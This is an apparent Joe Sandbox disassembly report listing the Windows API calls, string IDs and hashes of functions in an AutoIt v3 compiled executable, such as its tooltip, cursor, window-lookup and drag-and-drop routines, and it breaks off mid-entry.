                                                    • GetCursorPos.USER32(?), ref: 007F5007
                                                    • GetDesktopWindow.USER32 ref: 007F501C
                                                    • GetWindowRect.USER32(00000000), ref: 007F5023
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 007F5085
                                                    • DestroyWindow.USER32(?), ref: 007F50B1
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007F50DA
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007F50F8
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007F511E
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 007F5133
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007F5146
                                                    • IsWindowVisible.USER32(?), ref: 007F5166
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007F5181
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007F5195
                                                    • GetWindowRect.USER32(?,?), ref: 007F51AD
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 007F51D3
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 007F51ED
                                                    • CopyRect.USER32(?,?), ref: 007F5204
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 007F526F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: 368b0f64481d3bfb2f7b8d37bc182d7a729f0e4d920c14906bf57358c725b0fe
                                                    • Instruction ID: ae4903aeca466d14be7b750bbfa4767647a2608b341c6fbd59a8d1339862a98a
                                                    • Opcode Fuzzy Hash: 368b0f64481d3bfb2f7b8d37bc182d7a729f0e4d920c14906bf57358c725b0fe
                                                    • Instruction Fuzzy Hash: D7B16A71604744AFDB44DF64C849B6ABBE5FF88310F008A1CF6999B291DB75EC05CB92
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 007D499C
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007D49C2
                                                    • _wcscpy.LIBCMT ref: 007D49F0
                                                    • _wcscmp.LIBCMT ref: 007D49FB
                                                    • _wcscat.LIBCMT ref: 007D4A11
                                                    • _wcsstr.LIBCMT ref: 007D4A1C
                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007D4A38
                                                    • _wcscat.LIBCMT ref: 007D4A81
                                                    • _wcscat.LIBCMT ref: 007D4A88
                                                    • _wcsncpy.LIBCMT ref: 007D4AB3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 699586101-1459072770
                                                    • Opcode ID: f391086d5a803f08c0b288c5d75018c2d78e758e95a5b298b6208cf7da8df8dc
                                                    • Instruction ID: 681c75ecb3f1c49e2e9afba99724d5e57a7f5741ff28ba11de3903ff5608d24e
                                                    • Opcode Fuzzy Hash: f391086d5a803f08c0b288c5d75018c2d78e758e95a5b298b6208cf7da8df8dc
                                                    • Instruction Fuzzy Hash: DC41E172600215FBEF10B764EC4AEBF777CEF41710F00405AF918E6292EB7D9A0296A5
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00772C8C
                                                    • GetSystemMetrics.USER32(00000007), ref: 00772C94
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00772CBF
                                                    • GetSystemMetrics.USER32(00000008), ref: 00772CC7
                                                    • GetSystemMetrics.USER32(00000004), ref: 00772CEC
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00772D09
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00772D19
                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00772D4C
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00772D60
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00772D7E
                                                    • GetStockObject.GDI32(00000011), ref: 00772D9A
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00772DA5
                                                      • Part of subcall function 00772714: GetCursorPos.USER32(?), ref: 00772727
                                                      • Part of subcall function 00772714: ScreenToClient.USER32(008377B0,?), ref: 00772744
                                                      • Part of subcall function 00772714: GetAsyncKeyState.USER32(00000001), ref: 00772769
                                                      • Part of subcall function 00772714: GetAsyncKeyState.USER32(00000002), ref: 00772777
                                                    • SetTimer.USER32(00000000,00000000,00000028,007713C7), ref: 00772DCC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: c85d5733520867994d9498e279e700738a623f44cb5693268a402c79dee2b984
                                                    • Instruction ID: 4e046da53a99827d67d8c7f9dd942bdd7fc8de36a49d2315b0e96daa4e94d638
                                                    • Opcode Fuzzy Hash: c85d5733520867994d9498e279e700738a623f44cb5693268a402c79dee2b984
                                                    • Instruction Fuzzy Hash: A3B17E7160020AEFDF15DFA8CC59BAD7BA4FB48350F108629FA19A7290DB78E841CF54
                                                    APIs
                                                      • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                    • GetForegroundWindow.USER32(00800980,?,?,?,?,?), ref: 007904E3
                                                    • IsWindow.USER32(?), ref: 007C66BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$Foreground_memmove
                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                    • API String ID: 3828923867-1919597938
                                                    • Opcode ID: c1a0ecd0ecce7c80c4c533b5573b4d808f054f834f08b0fcd2b50e268ba08043
                                                    • Instruction ID: 5fd78dc8f32545ef0dae35a1d24f750954a3e082e3052813a16e23273b0b6de4
                                                    • Opcode Fuzzy Hash: c1a0ecd0ecce7c80c4c533b5573b4d808f054f834f08b0fcd2b50e268ba08043
                                                    • Instruction Fuzzy Hash: 6AD1A570104202DFCB08EF60D885EAABBB5FF54344F504A1DF495975A2DB38E999CB92
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 007F44AC
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007F456C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: e31177ce1aa3a9c60afb007b0068c3ef06f57bcc26900d6a928201a6b7aa4c05
                                                    • Instruction ID: aa74f8a79a00e0c7d2df8a7125ca77286b3af2ec988cb49538cafcbe6c5dfb53
                                                    • Opcode Fuzzy Hash: e31177ce1aa3a9c60afb007b0068c3ef06f57bcc26900d6a928201a6b7aa4c05
                                                    • Instruction Fuzzy Hash: 00A16C30214215DFCB14EF60C855A7AB3A5FF85354F10896CFA969B392DB38EC49CB91
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 007E56E1
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 007E56EC
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 007E56F7
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 007E5702
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 007E570D
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 007E5718
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 007E5723
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 007E572E
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 007E5739
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 007E5744
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 007E574F
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 007E575A
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 007E5765
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 007E5770
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 007E577B
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 007E5786
                                                    • GetCursorInfo.USER32(?), ref: 007E5796
                                                    • GetLastError.KERNEL32(00000001,00000000), ref: 007E57C1
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                    • String ID:
                                                    • API String ID: 3215588206-0
                                                    • Opcode ID: fc222f43c88111d9730461d650a3054658b91c25b48231a3567c339ebd31c096
                                                    • Instruction ID: 23ef72e37f68feba2323e8bd7b82903b82013540eb6bfdf02b31e495c2988dfd
                                                    • Opcode Fuzzy Hash: fc222f43c88111d9730461d650a3054658b91c25b48231a3567c339ebd31c096
                                                    • Instruction Fuzzy Hash: 80415370E04319AADB109FB68C49D6EFEF8EF55B54B10452FE509E7290DAB8A400CF91
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 007CB17B
                                                    • __swprintf.LIBCMT ref: 007CB21C
                                                    • _wcscmp.LIBCMT ref: 007CB22F
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007CB284
                                                    • _wcscmp.LIBCMT ref: 007CB2C0
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 007CB2F7
                                                    • GetDlgCtrlID.USER32(?), ref: 007CB349
                                                    • GetWindowRect.USER32(?,?), ref: 007CB37F
                                                    • GetParent.USER32(?), ref: 007CB39D
                                                    • ScreenToClient.USER32(00000000), ref: 007CB3A4
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 007CB41E
                                                    • _wcscmp.LIBCMT ref: 007CB432
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 007CB458
                                                    • _wcscmp.LIBCMT ref: 007CB46C
                                                      • Part of subcall function 0079385C: _iswctype.LIBCMT ref: 00793864
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                    • String ID: %s%u
                                                    • API String ID: 3744389584-679674701
                                                    • Opcode ID: f6ffad6e972a4924e6be39a51069ee9f9ecaaf3f15c7774b320c664bfd1cfa30
                                                    • Instruction ID: 3b62c603966ae03cb115a87d787289cf65f64671039a85cb070b4219c21b275d
                                                    • Opcode Fuzzy Hash: f6ffad6e972a4924e6be39a51069ee9f9ecaaf3f15c7774b320c664bfd1cfa30
                                                    • Instruction Fuzzy Hash: FFA1E171204346EBDB18DF60C886FAAB7E8FF44350F10461DF999C2191DB38EA55CBA1
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 007CBAB1
                                                    • _wcscmp.LIBCMT ref: 007CBAC2
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 007CBAEA
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 007CBB07
                                                    • _wcscmp.LIBCMT ref: 007CBB25
                                                    • _wcsstr.LIBCMT ref: 007CBB36
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 007CBB6E
                                                    • _wcscmp.LIBCMT ref: 007CBB7E
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 007CBBA5
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 007CBBEE
                                                    • _wcscmp.LIBCMT ref: 007CBBFE
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 007CBC26
                                                    • GetWindowRect.USER32(00000004,?), ref: 007CBC8F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: c08c5a6a31463452ee376096eca47eeb0566b486b1ebb2671d59acc34e553676
                                                    • Instruction ID: 5eb2a3589362b678dffd100a8fe12f9052d4084c1d760c7ed0950a407dd79ff3
                                                    • Opcode Fuzzy Hash: c08c5a6a31463452ee376096eca47eeb0566b486b1ebb2671d59acc34e553676
                                                    • Instruction Fuzzy Hash: 8C819E710043099BDB14DF64D886FAA77E8FF44314F04856DFD8A9A096DB38ED4ACB61
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: e48a205a642cc34fcb500e4784126c49173c12d0a552b5b429eae2e795dfbcab
                                                    • Instruction ID: a13a08e4becea7eca87676cbbb977e2c690bd3c01da6e4b04b0cfe91e2f6d423
                                                    • Opcode Fuzzy Hash: e48a205a642cc34fcb500e4784126c49173c12d0a552b5b429eae2e795dfbcab
                                                    • Instruction Fuzzy Hash: C131C230684215EBCB08FA50ED47FAD73A8AF20750FA0012DF551B11D1EF6DBE048656
                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 007CCBAA
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007CCBBC
                                                    • SetWindowTextW.USER32(?,?), ref: 007CCBD3
                                                    • GetDlgItem.USER32(?,000003EA), ref: 007CCBE8
                                                    • SetWindowTextW.USER32(00000000,?), ref: 007CCBEE
                                                    • GetDlgItem.USER32(?,000003E9), ref: 007CCBFE
                                                    • SetWindowTextW.USER32(00000000,?), ref: 007CCC04
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007CCC25
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007CCC3F
                                                    • GetWindowRect.USER32(?,?), ref: 007CCC48
                                                    • SetWindowTextW.USER32(?,?), ref: 007CCCB3
                                                    • GetDesktopWindow.USER32 ref: 007CCCB9
                                                    • GetWindowRect.USER32(00000000), ref: 007CCCC0
                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007CCD0C
                                                    • GetClientRect.USER32(?,?), ref: 007CCD19
                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007CCD3E
                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007CCD69
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 450f8487c759e33080898960fb923ea9ae2a5544ed1ebf663c9aa97928dd55f1
                                                    • Instruction ID: a8d2d431c5770a436a186426f4d03463ac7f049f9bac59df5078a84a76ee4508
                                                    • Opcode Fuzzy Hash: 450f8487c759e33080898960fb923ea9ae2a5544ed1ebf663c9aa97928dd55f1
                                                    • Instruction Fuzzy Hash: F8515D70900709EFDB219FA8CE8AF6EBBB5FF44705F00491CE55AA25A0DB79A914CF50
                                                    APIs
                                                    • _memset.LIBCMT ref: 007FA87E
                                                    • DestroyWindow.USER32(00000000,?), ref: 007FA8F8
                                                      • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007FA972
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007FA994
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FA9A7
                                                    • DestroyWindow.USER32(00000000), ref: 007FA9C9
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00770000,00000000), ref: 007FAA00
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007FAA19
                                                    • GetDesktopWindow.USER32 ref: 007FAA32
                                                    • GetWindowRect.USER32(00000000), ref: 007FAA39
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007FAA51
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007FAA69
                                                      • Part of subcall function 007729AB: GetWindowLongW.USER32(?,000000EB), ref: 007729BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 1297703922-3619404913
                                                    • Opcode ID: 8a10233b4010c92ea8f453682d345aad2165d839b46a0f911446552b748c3c9f
                                                    • Instruction ID: b3972d50ff303b140d1e54c5a74cc89cd2a8c22c3c324524e8a9903451be0838
                                                    • Opcode Fuzzy Hash: 8a10233b4010c92ea8f453682d345aad2165d839b46a0f911446552b748c3c9f
                                                    • Instruction Fuzzy Hash: 5C7189B1150208AFD721CF28C849F7A77E9FB88300F04492DFA89973A1D779E916DB56
                                                    APIs
                                                      • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                    • DragQueryPoint.SHELL32(?,?), ref: 007FCCCF
                                                      • Part of subcall function 007FB1A9: ClientToScreen.USER32(?,?), ref: 007FB1D2
                                                      • Part of subcall function 007FB1A9: GetWindowRect.USER32(?,?), ref: 007FB248
                                                      • Part of subcall function 007FB1A9: PtInRect.USER32(?,?,007FC6BC), ref: 007FB258
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007FCD38
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007FCD43
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007FCD66
                                                    • _wcscat.LIBCMT ref: 007FCD96
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007FCDAD
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007FCDC6
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 007FCDDD
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 007FCDFF
                                                    • DragFinish.SHELL32(?), ref: 007FCE06
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007FCEF9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                    • API String ID: 169749273-3440237614
                                                    • Opcode ID: 2eb98d924064187a34612e0efa504deba756e83832751e88e79d3aff4539e761
                                                    • Instruction ID: c2664d9e90ed52d02c3245a94a1196d44b8fafc9ea3b83b769d949577db39923
                                                    • Opcode Fuzzy Hash: 2eb98d924064187a34612e0efa504deba756e83832751e88e79d3aff4539e761
                                                    • Instruction Fuzzy Hash: 37617F71108304AFC711EF50DC89E6FBBE8FF84350F400A2DF6A5922A1DB759A49CB52
                                                    APIs
                                                    • VariantInit.OLEAUT32(00000000), ref: 007D831A
                                                    • VariantCopy.OLEAUT32(00000000,?), ref: 007D8323
                                                    • VariantClear.OLEAUT32(00000000), ref: 007D832F
                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007D841D
                                                    • __swprintf.LIBCMT ref: 007D844D
                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 007D8479
                                                    • VariantInit.OLEAUT32(?), ref: 007D852A
                                                    • SysFreeString.OLEAUT32(?), ref: 007D85BE
                                                    • VariantClear.OLEAUT32(?), ref: 007D8618
                                                    • VariantClear.OLEAUT32(?), ref: 007D8627
                                                    • VariantInit.OLEAUT32(00000000), ref: 007D8665
                                                    Strings
                                                    Memory Dump Source
